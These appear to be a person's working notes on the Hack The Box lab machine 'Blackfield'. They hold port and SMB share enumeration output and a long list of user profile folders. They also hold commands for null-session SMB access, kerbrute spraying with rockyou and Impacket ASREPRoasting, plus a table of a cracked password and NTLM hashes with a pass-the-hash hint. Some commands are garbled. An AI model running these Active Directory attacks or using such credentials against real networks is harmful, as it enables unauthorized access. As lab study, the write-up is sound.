
  • User
  • root  





support@blackfield.local #00^BlackKnightHash stolen with ASREPRoasting
administrator7f1e4ff8c6a8e6b6fcae2d9c0572cd62 (NTLM)Stolen from lsass.dmp
svc_backup9658d1d1dcd9250115e2205d9f48400dStolen from lsass.dmp. Use this hash to pass to e-winrm for user access.



OS: Windows

OS Version:

DNS Hostname:

Domain: BLACKFIELD.local



Open Ports

domain on tcp/53
kerberos-sec on tcp/88
msrpc on tcp/135
ldap on tcp/389
microsoft-ds on tcp/445
ncacn_http on tcp/593
ldap on tcp/3268
http on tcp/5985
domain on udp/53

Manual Enumeration

Alright. So it doesn't look like there's any web servers or anything on this machine. It does look like LDAP/SMB/NetBIOS is running though. I'll just start trawling through these results.   The nmap scan on 445 failed because autorecon/nmap were only using smb1. I need to rescan this later?

The ldap nmap scan on tcp/389 came back with the full ldap root results. I didn't see anything super interesting off the break. Might come back to this, and try to dump more ldap information.

Kerberos server is running on tcp/88. Can I use any kerberos attacks? Impacket getNPusers etc?

Oh shit here we go. The smb scan results had some information.

   |  ~/cybersecurity/htb/boxes/ ······································ 19:46:50   ─╮
❯ cat smbclient.txt                                                                                                                                                         ─╯
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

   |  ~/cybersecurity/htb/boxes/ ······································ 19:48:00   ─╮
❯ cat smbmap-share-permissions.txt                                                                                                                         ─╯
[+] IP: blackfield.htb:445      Name: unknown
[+] Guest session       IP: blackfield.htb:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

   |  ~/cybersecurity/htb/boxes/ ······································ 19:48:06   ─╮
❯ cat smbmap-list-contents.txt                                                                                       ─╯
[+] IP: blackfield.htb:445      Name: unknown
[+] Guest session       IP: blackfield.htb:445  Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    InitShutdown
        fr--r--r--                5 Sun Dec 31 19:03:58 1600    lsass
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    scerpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-3a0-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    epmapper
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-1d0-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    eventlog
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-52c-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    TermSrv_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    Ctx_WinStation_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    atsvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-6e0-0
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    wkssvc
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    SessEnvPublicRpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-25c-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-87c-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-25c-1
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    RpcProxy\49674
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    6eb9c1b06b1de82d
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    RpcProxy\593
        fr--r--r--                6 Sun Dec 31 19:03:58 1600    srvsvc
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    spoolss
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-bf4-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    netdfs
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    vgauth-service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    W32TIME_ALT
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    tapsrv
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ROUTER
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-254-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-a24-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    efsrpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PSHost.132447102234299230.5372.DefaultAppDomain.powershell
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-a9c-0
        NETLOGON                                                NO ACCESS       Logon server share
        profiles$                                               READ ONLY
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    .
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ..
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AAlleni
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABarteski
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABekesz
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABenzies
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ABiemiller
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AChampken
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ACheretei
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ACsonaki
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AHigchens
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AJaquemai
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKlado
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKoffenburger
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKollolli
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKruppe
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AKubale
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ALamerz
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AMaceldon
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AMasalunga
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ANavay
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ANesterova
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ANeusse
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AOkleshen
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    APustulka
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ARotella
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ASanwardeker
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AShadaia
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ASischo
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ASpruce
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ATakach
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ATaueg
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ATwardowski
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    audit2020
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AWangenheim
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AWorsey
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    AZigmunt
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BBakajza
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BBeloucif
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BCarmitcheal
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BConsultant
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BErdossy
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BGeminski
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BLostal
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BMannise
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BNovrotsky
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BRigiero
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BSamkoses
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    BZandonella
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CAcherman
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CAkbari
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CAldhowaihi
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CArgyropolous
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CDufrasne
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CGronk
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    Chiucarello
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    Chiuccariello
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CHoytal
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CKijauskas
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CKolbo
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CMakutenas
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CMorcillo
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CSchandall
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CSelters
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    CTolmie
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DCecere
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DChintalapalli
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DCwilich
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DGarbatiuc
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DKemesies
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMatuka
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMedeme
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMeherek
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DMetych
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DPaskalev
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DPriporov
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DRusanovskaya
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DVellela
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DVogleson
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    DZwinak
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    EBoley
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    EEulau
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EFeatherling
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EFrixione
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EJenorik
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EKmilanovic
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ElKatkowsky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EmaCaratenuto
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EPalislamovic
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EPryar
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ESachhitello
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ESariotti
        dr--r--r--                0 Wed Jun  3 12:47:11 2020    ETurgano
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    EWojtila
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FAlirezai
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FBaldwind
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FBroj
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FDeblaquire
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FDegeorgio
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FianLaginja
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FLasokowski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FPflum
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    FReffey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GaBelithe
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    Gareld
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GBatowski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GForshalger
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GGomane
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GHisek
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GMaroufkhani
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GMerewether
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GQuinniey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GRoswurm
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    GWiegard
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HBlaziewske
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HColantino
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HConforto
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HCunnally
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HGougen
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    HKostova
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    IChristijr
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    IKoledo
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    IKotecky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ISantosi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JAngvall
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JBehmoiras
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JDanten
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JDjouka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JKondziola
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JLeytushsenior
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JLuthner
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JMoorehendrickson
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JPistachio
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JScima
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JSebaali
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JShoenherr
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    JShuselvt
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KAmavisca
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KAtolikian
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KBrokinn
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KCockeril
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KColtart
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KCyster
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KDorney
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KKoesno
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KLangfur
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KMahalik
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KMasloch
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KMibach
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KParvankova
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KPregnolato
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KRasmor
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KShievitz
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KSojdelius
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KTambourgi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KVlahopoulos
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    KZyballa
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBajewsky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBaligand
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBarhamand
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBirer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LBobelis
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LChippel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LChoffin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LCominelli
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LDruge
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LEzepek
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LHyungkim
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKarabag
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKirousis
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKnade
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LKrioua
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LLefebvre
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LLoeradeavilez
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LMichoud
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LTindall
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    LYturbe
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MArcynski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MAthilakshmi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MAttravanam
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MBrambini
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MHatziantoniou
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MHoerauf
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MKermarrec
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MKillberg
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MLapesh
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MMakhsous
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MMerezio
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MNaciri
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MShanmugarajah
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MSichkar
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MTemko
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MTipirneni
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MTonuri
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    MVanarsdel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NBellibas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NDikoka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NGenevro
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NGoddanti
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NMrdirk
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NPulido
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NRonges
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NSchepkie
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    NVanpraet
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OBelghazi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OBushey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OHardybala
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    OLunas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ORbabka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PBourrat
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PBozzelle
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PBranti
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PCapperella
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PCurtz
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PDoreste
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PGegnas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PMasulla
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PMendlinger
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PParakat
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PProvencer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PTesik
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PVinkovich
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PVirding
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    PWeinkaus
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RBaliukonis
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RBochare
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RKrnjaic
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RNemnich
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RPoretsky
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RStuehringer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RSzewczuga
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RVallandas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RWeatherl
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    RWissor
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SAbdulagatov
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SAjowi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SAlguwaihes
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SBonaparte
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SBouzane
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SChatin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SDellabitta
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SDhodapkar
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SEulert
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SFadrigalan
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SGolds
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SGrifasi
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SGtlinas
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SHauht
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SHederian
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SHelregel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SKrulig
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SLewrie
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SMaskil
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    Smocker
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SMoyta
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SRaustiala
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SReppond
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SSicliano
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SSilex
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SSolsbak
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    STousignaut
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    support
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    svc_backup
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SWhyte
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    SWynigear
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TAwaysheh
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TBadenbach
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TCaffo
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TCassalom
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TEiselt
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TFerencdo
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TGaleazza
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TKauten
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TKnupke
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TLintlop
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TMusselli
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TOust
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TSlupka
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TStausland
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    TZumpella
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    UCrofskey
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    UMarylebone
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    UPyrke
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VBublavy
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VButziger
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VFuscca
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VLitschauer
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VMamchuk
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VMarija
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VOlaosun
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    VPapalouca
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    WSaldat
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    WVerzhbytska
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    WZelazny
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XBemelen
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XDadant
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XDebes
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XKonegni
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    XRykiel
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YBleasdale
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YHuftalin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YKivlen
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YKozlicki
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YNyirenda
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YPredestin
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YSeturino
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YSkoropada
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YVonebers
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    YZarpentine
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZAlatti
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZKrenselewski
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZMalaab
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZMiick
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZScozzari
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZTimofeeff
        dr--r--r--                0 Wed Jun  3 12:47:12 2020    ZWausik
        SYSVOL                                                  NO ACCESS       Logon server share

I guess I should start by seeing if there is anything interesting in the profiles shares? Scanning through the list of names one stands out, audit2020. It's the only one that doesn't match the naming conventions.

I couldn't connect to the SMB share with my standard -U % syntax. After looking at the autorecon commands.log file, I thought to try the connection with -U null% . This worked!

  \| \~/cybersecurity/htb/boxes/ ············································ 19:55:03 ─╮
❯ smbclient [\\\\\\\\\\\\profiles\$](file://$) -U null% ─╯
\'Try \"help\" to get a list of possible commands.
smb: \\\>

Dir of audit2020 comes up empty. I don't think there is anything here. I can confirm by using the command 'recurse on' then ls.

I'll run enum4linux again, this time with the domain specified.

  \| \~/cybersecurity/htb/boxes/ ············································ 20:02:07 ─╮
❯ enum4linux -a -M -l -d -w BLACKFIELD.local blackfield.htb 2\>&1 \| tee \"/home/borari/cybersecurity/htb/boxes/\"

I create a list of users from the SMB share by copying the profile$ directories, then using awk.

  \| \~/cybersecurity/htb/boxes/ ······································ 20:07:52 ─╮
❯ cat ../users.txt | awk -F '2020    ' '{print $2}' > users.list

Now I can try to kerbrute the list of users.

  \| \~/cybersecurity/htb/boxes/ ············································ 20:22:26 ─╮
❯ kerbrute -dc-ip -domain blackfield.local -users users.list -passwords /usr/share/wordlists/rockyou.utf8.txt -outputfile blackfield_kerbcreds.txt
Impacket v0.9.22.dev1+20200909.150738.15f3df26 - Copyright 2020 SecureAuth Corporation

Running in debug mode, it looks like most of those users don't actually exist? It hangs at audit2020 though. I should try an ASREPRoast attack. I think part of that involves a script that finds valid users?

   |  ~/cybersecurity/htb/boxes/ ··································· KILL ✘  20:26:51   ─╮
❯ blackfield.local/ -dc-ip -no-pass -usersfile users.list                                 ─╯
Impacket v0.9.22.dev1+20200909.150738.15f3df26 - Copyright 2020 SecureAuth Corporation
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

Oh shit, yeah. I think I might have something here. Let's try to crack the hash.
